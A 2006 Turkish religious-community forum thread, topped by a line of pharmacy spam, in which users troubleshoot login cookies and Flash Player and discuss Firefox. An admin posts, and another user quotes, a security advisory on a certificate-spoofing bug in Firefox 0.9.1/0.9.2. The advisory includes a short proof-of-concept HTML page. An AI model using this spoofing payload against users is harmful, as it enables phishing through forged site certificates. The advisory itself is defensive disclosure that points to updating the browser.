generique plaquenil colchicine generique rhinocortfluvoxamine chloroquine fludapamide fludex forzest fosamax frumil fulcin furacin furadantin furo basan furodrix gabantine gastroprazol geodon glaupax gli basan glibenese glibenorme glimerax glimeryle glucobay gluconormine glucophage xr glucophage glucotrol xl glucotrol glucovance gracial grifulvin gris peg grisol grisovin gyne lotrimin hard on oral jelly hard on helvecin helvevir hypnorex hytrin bph hytrin hyzaar ilosone

0
0
0
0
Forum Giris Giris Üyeler Ekibimiz Arama
Toplam Forum: 69     ***     Toplam Konu: 30100     ***     Toplam Mesaj: 148193

Beni hatırla
Forum Anasayfa » ÜYELER PANOSU » ÜYE HİZMETLERİ » yardım eder misiniz?

önceki konu   diğer konu
20 okunmamış mesaj mevcut (Acik)
Sayfa (1): (1)
Gönderen
yardım eder misiniz?
Misafir
selamun aleykum;
siteden çýktýðýmda, sonradan tekrar girerken þifremi bir türlü kabul etmiyor. her defasýnda þifremi unuttum diyerek mailime gelen linkten girmek zorunda kalýyorum. her defasýnda da girer girmez þifremi deðiþtiriyorum, gerçi hep ayný þifreyi giriyorum ama her defasýnda da kabul etmiyor. niye böyle oluyor acaba???
Gönderen: 04.01.2006 - 22:37
Bu Mesaji Bildir   Yukari
RuZGaR su an offline RuZGaR  
Moderator

1295 Mesaj -
yine linkle giriþ yapmak zorunda kaldým. yalnýz aklýma sonradan þu geldi, ben üye adýmý deðiþtirmiþtim. bu yüzden mi acaba kabul etmiyor? çünkü gelen linkte hala eski üye adým geçiyor. acaba eski adýmla mý giriþ yapmalýyým?
Gönderen: 04.01.2006 - 22:42
Bu Mesaji Bildir   RuZGaR üyenin diger mesajlarini ara RuZGaR üyenin Profiline bak RuZGaR üyeye özel mesaj gönder RuZGaR üyeyi arkadas listeme ekle Yukari
DeLiAsIk su an offline DeLiAsIk  
Moderator

352 Mesaj -
betul kardesim cookieslerini siliyormusun??

üye adin degismemisse o yüzdende olabilir..
Gönderen: 04.01.2006 - 23:41
Bu Mesaji Bildir   DeLiAsIk üyenin diger mesajlarini ara DeLiAsIk üyenin Profiline bak DeLiAsIk üyeye özel mesaj gönder DeLiAsIk üyeyi arkadas listeme ekle Yukari
F a t i h su an offline F a t i h  
Moderator

1050 Mesaj -
Ve aleyküm Selam,

login adý (giriþ adýgöz kırpma ile Nickname farklýdýr. Giriþ adý deðitirilememektedir. Sorun cookisleri sildiðinizde ve de Beni Hatýrla bölümünü iþaretleyerek giriþ yaptýðýnýzda çözümlenir inþa-Allah...

Selam ve dua ile...
Gönderen: 05.01.2006 - 01:03
Bu Mesaji Bildir   F a t i h üyenin diger mesajlarini ara F a t i h üyenin Profiline bak F a t i h üyeye özel mesaj gönder F a t i h üyeyi arkadas listeme ekle Yukari
tugba009 su an offline tugba009  
RE:
84 Mesaj -
Alıntı
Orijýnalý F a t i h

Ve aleyküm Selam,

login adý (giriþ adýgöz kırpma ile Nickname farklýdýr. Giriþ adý deðitirilememektedir. Sorun cookisleri sildiðinizde ve de Beni Hatýrla bölümünü iþaretleyerek giriþ yaptýðýnýzda çözümlenir inþa-Allah...

Selam ve dua ile...

ayni olay bendede oluyor, fatih abininde dedigi gibi, bazen nette ziyaret ettiðin yerleri silmen gerek. Bunu yapmadýðýn için olmayabilir. PC de systemsteuerung a girip oradan, internetoptionen dan açýlan kücük pencereden cookies yazan butonu tiklayarak silmis oluyorsunuz eminimki düzelecektir...

Mesaj 1 kez düzenlendi. En son tugba009 tarafından, 05.01.2006 - 09:39 tarihinde.
Gönderen: 05.01.2006 - 09:35
Bu Mesaji Bildir   tugba009 üyenin diger mesajlarini ara tugba009 üyenin Profiline bak tugba009 üyeye özel mesaj gönder tugba009 üyeyi arkadas listeme ekle Yukari
Moderator

1295 Mesaj -
evet firefox kullanmaya baþladýðýmdan beri explorer daki cookie leri silmeyi unuttuðumu farkettim. explorer ý nadiren kullanýyordum da. Yardýmlarýnýz için Allah razý olsun.
Gönderen: 05.01.2006 - 12:46
Bu Mesaji Bildir   RuZGaR üyenin diger mesajlarini ara RuZGaR üyenin Profiline bak RuZGaR üyeye özel mesaj gönder RuZGaR üyeyi arkadas listeme ekle Yukari
Gast Misafir  
özür dilerim konuyu bölüyorum
Misafir
firefox ne?????
Gönderen: 05.01.2006 - 14:07
Gast Misafir  
Misafir
ve bir de ben anasayfadaki sunumu göremiyorum. yine sað ve soldaki bazý kýsýmlarda açýlmýyor. neden acaba????
Gönderen: 05.01.2006 - 14:27
KIRMIZIGuL su an offline KIRMIZIGuL  
RE: misafir kardes e
540 Mesaj -
Alıntı
Orijýnalý Misafir

ve bir de ben anasayfadaki sunumu göremiyorum. yine sað ve soldaki bazý kýsýmlarda açýlmýyor. neden acaba????

s.a. Kardesim...

Anasayfadaki flaslari görebilmek icin bilgisayarinizda flashplayer yüklu olmasi lazim.

firefox mozilla tipki internet explorer gibi bir internete baglanma programidir.

selam ve dua ile...
Gönderen: 05.01.2006 - 16:29
Bu Mesaji Bildir   KIRMIZIGuL üyenin diger mesajlarini ara KIRMIZIGuL üyenin Profiline bak KIRMIZIGuL üyeye özel mesaj gönder KIRMIZIGuL üyeyi arkadas listeme ekle Yukari
Gast Misafir  
kırmızıgül'e
Misafir
ilginiz için teþkkür ediyorum.
en kýsa zamanda flashplayer yükleyeceðim inþ.
bu programla ilgili sizlerin tavsiye edeceði bir site var mý acaba
ve bir de firefox'un özelliði ne? ne gibi avantajý var?
Gönderen: 06.01.2006 - 11:43
Moderator

1295 Mesaj -
ben firefox un explorer a göre daha güvenli olduðunu duymuþtum. Bu yüzden firefox kullanmaya baþladým. Ama kesin bir bilgim yok. Bir de bazý siteler firefox da daha hýzlý açýlýyor. mesela ravda da bu sitelerden. explorer da site açýlýrken daha çok bekliyordum. þimdi daha çabuk açýlýyo site. Selametle..
Gönderen: 06.01.2006 - 13:03
hekim su an offline hekim  
Konu icon    bencede hızlı...
7 Mesaj
bende dün indirdim firefox u baya hýzlý bence daha iyi..
Gönderen: 06.01.2006 - 13:31
Bu Mesaji Bildir   hekim üyenin diger mesajlarini ara hekim üyenin Profiline bak hekim üyeye özel mesaj gönder hekim üyeyi arkadas listeme ekle Yukari
MeLiH su an offline MeLiH  
Evet hızlı ama .. Dikkat..
Admin

280 Mesaj -
Risk Seviyesi: Yüksek
Etkilenen Sistemler: Mozilla Firefox 0.9.1 ve 0.9.2 sürümleri

Firefox'un cache iþlemindeki bir problem kötü amaçlý kiþilerin herhangi bir web sitesi sertifikasýný kendisininmiþ gibi kullanabilmesine izin veriyor.
Problem <body> tag'i içerisinde OnUnload, HTTP-Equiv Refresh metatag, document.write() ve document.close() kullanýlarak exploit edilebiliyor.

Örnek:
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>

Çözüm:
Yama yada yeni sürüm hazýr olduðunda güncelleme yapýlmalý.

h**p://www.mozilla.org/download.html

Kaynak: h**p://security-protocols.com/modules.php?name=News&file=article&sid=2079

Not : Bu Bilgi Alýntýdýr. Konudaki linklere ulasabilmek için linkleri kopyalayýp browserinize yapýþtýrýn ve h**p:// bölümünü http:// olarak düzeltin..

Selam ve DUA ile..

Gönderen: 06.01.2006 - 21:57
Bu Mesaji Bildir   MeLiH üyenin diger mesajlarini ara MeLiH üyenin Profiline bak MeLiH üyeye özel mesaj gönder MeLiH üyeyi arkadas listeme ekle Yukari
Gast Misafir  
selamun aleykum
Misafir
ben daha önce de anasayfadaki bazý bölümlerin açýlmadýðýný söylemiþtim.
bununlailgili olarak kýrmýzýgül kardeþimiz flashplayer yüklemelisiniz demiþti.

macromedia flash player 08 yükledim ama hala açýlmýyor. bunun baþka bir sebebi olabilir mi?
Gönderen: 21.01.2006 - 11:37
fosaloglu su an offline fosaloglu  
RE: Evet hızlı ama .. Dikkat..
2683 Mesaj -
Alıntı
Orijýnalý MeLiH

Risk Seviyesi: Yüksek
Etkilenen Sistemler: Mozilla Firefox 0.9.1 ve 0.9.2 sürümleri

Firefox'un cache iþlemindeki bir problem kötü amaçlý kiþilerin herhangi bir web sitesi sertifikasýný kendisininmiþ gibi kullanabilmesine izin veriyor.
Problem <body> tag'i içerisinde OnUnload, HTTP-Equiv Refresh metatag, document.write() ve document.close() kullanýlarak exploit edilebiliyor.

Örnek:
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>

Çözüm:
Yama yada yeni sürüm hazýr olduðunda güncelleme yapýlmalý.

h**p://www.mozilla.org/download.html

Kaynak: h**p://security-protocols.com/modules.php?name=News&file=article&sid=2079

Not : Bu Bilgi Alýntýdýr. Konudaki linklere ulasabilmek için linkleri kopyalayýp browserinize yapýþtýrýn ve h**p:// bölümünü http:// olarak düzeltin..

Selam ve DUA ile..

Anladýðým kadarýyla risk altýnda olan firefox mozzila kullnacýlarý deðil; firefox'la baðlanýlan siteler. Exploit olabiliyorsa bir site hata sitenin yapýmcýlarýndadýr.

Ayrýca benim tercihim her zaman explorer olmuþtur.Ve öyle olacaktýr.
Gönderen: 21.01.2006 - 11:54
Bu Mesaji Bildir   fosaloglu üyenin diger mesajlarini ara fosaloglu üyenin Profiline bak fosaloglu üyeye özel mesaj gönder fosaloglu üyeyi arkadas listeme ekle Yukari
RE: selamun aleykum
Admin

280 Mesaj -
Alıntı
Orijýnalý Misafir

ben daha önce de anasayfadaki bazý bölümlerin açýlmadýðýný söylemiþtim.
bununlailgili olarak kýrmýzýgül kardeþimiz flashplayer yüklemelisiniz demiþti.

macromedia flash player 08 yükledim ama hala açýlmýyor. bunun baþka bir sebebi olabilir mi?

Vealeykumselam..

Anasayfadaki bazý bölümler derken neleri kasdettiðinizi biraz daha ayrýntýlý yazarsanýz yardýmcý olabiliriz inþallah.

Mesela anasayfada sol menudeki flash bannerleri ve ortadaki ana flashý görebiliyormusunuz ?

============================================================================

Fosaloglu kardeþim;
Sanýrým burada; "Girdiðiniz ve güvenli zannettiðiniz bir site Aslýnda guvenli olmadýðý halde baþka bir sitenin sertifikasýný kullanarak güvenliymiþ gibi görünebilir" demek isteniyor .. Zaten Firefoxun çok daha yeni versiyonlarý çýktý. Firefox 0.9.1 ve 0.9.2 sürümleri haricindekilerde bu sorun çýkmýyor (muþgöz kırpma sevinçli

Saygý, Selam ve DUA ile..
Gönderen: 21.01.2006 - 12:25
Bu Mesaji Bildir   MeLiH üyenin diger mesajlarini ara MeLiH üyenin Profiline bak MeLiH üyeye özel mesaj gönder MeLiH üyeyi arkadas listeme ekle Yukari
RE: RE: selamun aleykum
Moderator

1295 Mesaj -
Alıntı
Orijýnalý MeLiH

[ Zaten Firefoxun çok daha yeni versiyonlarý çýktý. Firefox 0.9.1 ve 0.9.2 sürümleri haricindekilerde bu sorun çýkmýyor (muþgöz kırpma sevinçli

Allah razý olsun. bende baya tedirgin olmuþtum. güvenli olmadýðý için. 1.5 kullanýyorum þimdi. inþ. bir sorun çýkmaz.Kararsiz
Gönderen: 21.01.2006 - 12:29
Gast Misafir  
RE: RE: selamun aleykum
Misafir
Alıntı
Orijýnalý MeLiH

Vealeykumselam..

Anasayfadaki bazý bölümler derken neleri kasdettiðinizi biraz daha ayrýntýlý yazarsanýz yardýmcý olabiliriz inþallah.

Mesela anasayfada sol menudeki flash bannerleri ve ortadaki ana flashý görebiliyormusunuz ?

bahsettiðiniz bölümleri kasdediyorum; sabataycýlar ve asým'ýn nesli diyor mesela ama görüntü ve ses yok...
Gönderen: 21.01.2006 - 12:32
Admin

280 Mesaj -
Anladým.. Sanýrým yuklediginiz Flash playerda sorun var..

BURAYA týklayýn, link açýldýktan sonra bir güvenlik sorusu gelecek karþýnýza install ve Don't install diye iki adet buton var install butonuna týklayýn ve yuklemenin tamamlanmasýný bekleyin. Sayfanýn üst kýsmýndaki flash filmini gördüðünüz anda flash player yüklenmiþ demektir.
Sonra anasayfamýzdaki flashý izlemeyi tekrar deneyin.

Bu iþlemden sonra yine bir sonuca varamazsanýz bildirin inþ.

Kolay Gelsin.
Saygý, Selam ve DUA ile.
Gönderen: 21.01.2006 - 13:48
Gast Misafir  
Misafir
ilgilendiðiniz için rabbim razý olsun ama verdiðiniz linkte bulunan install seçeneði seçilmediði sitenin kendi sayfasýndan da indiremedim....
Gönderen: 23.01.2006 - 12:12
Pozisyon - İmzalar göster
Sayfa (1): (1)
önceki konu   diğer konu

Lütfen Seçiniz:  
Şu an Yok üye ve 803 Misafir online. En son üyemiz: Didem_
2243 üye ile 29.03.2024 - 11:40 tarihinde en fazla ziyaretçi online oldu.

[Admin | Moderator | Kıdemli Üye | Üye]
Dogum Gününüzü Tebrik Ederiz    Doğum gününüzü tebrik eder, sıhhat ve afiyet dolu ömür dileriz:
mouharem68 (56), Mavi mutluluk (42), gardiyan (51), hüzünn (36), yanardag (49), kalebeyi (43), Trabzon61 (34), Kameraman_63 (61), Rabia1 (52), MaviguL (42), YSMNT (45), kardelen_06 (40), PembeGül (39), aliosmantr (37), safak13 (46), secere (47), yasargokmen (51), mehmet23 (53), HaBeSii (43), tkardelen (42), MUSTAFA ONUR (63), efendi54 (54), cemilakgun (48), &thorn;ip&thorn.. (45), cemilakgün (48), Moehh80 (44), ismailbaturay (47), tümtürk (36), SaBoTaJ (124), resadiyeli84 (40), muhammedali_x (49), metinx (49), Fatih almanya (44)
Son 24 saatin aktif konuları - Top Üyeler
0

Copyright © ((( RAVDA.net )))  *  İrtibat   *   RAVDA Reklam Servisi   *   Tüm hakları saklıdır, izinsiz alıntı yapılamaz.
Sitemizde yayınlanan imzalı yazıların içeriğinden yazarları, forum ve yorumlardan ekleyen şahıslar sorumlu olup, kesinlikle sitemiz sorumlu değildir.
© by ((( RAVDA.net )))

Sayfa 0.58677 saniyede açıldı   

Reklamlardan
RAVDA sitesi
hiçbir şekilde
sorumlu değildir.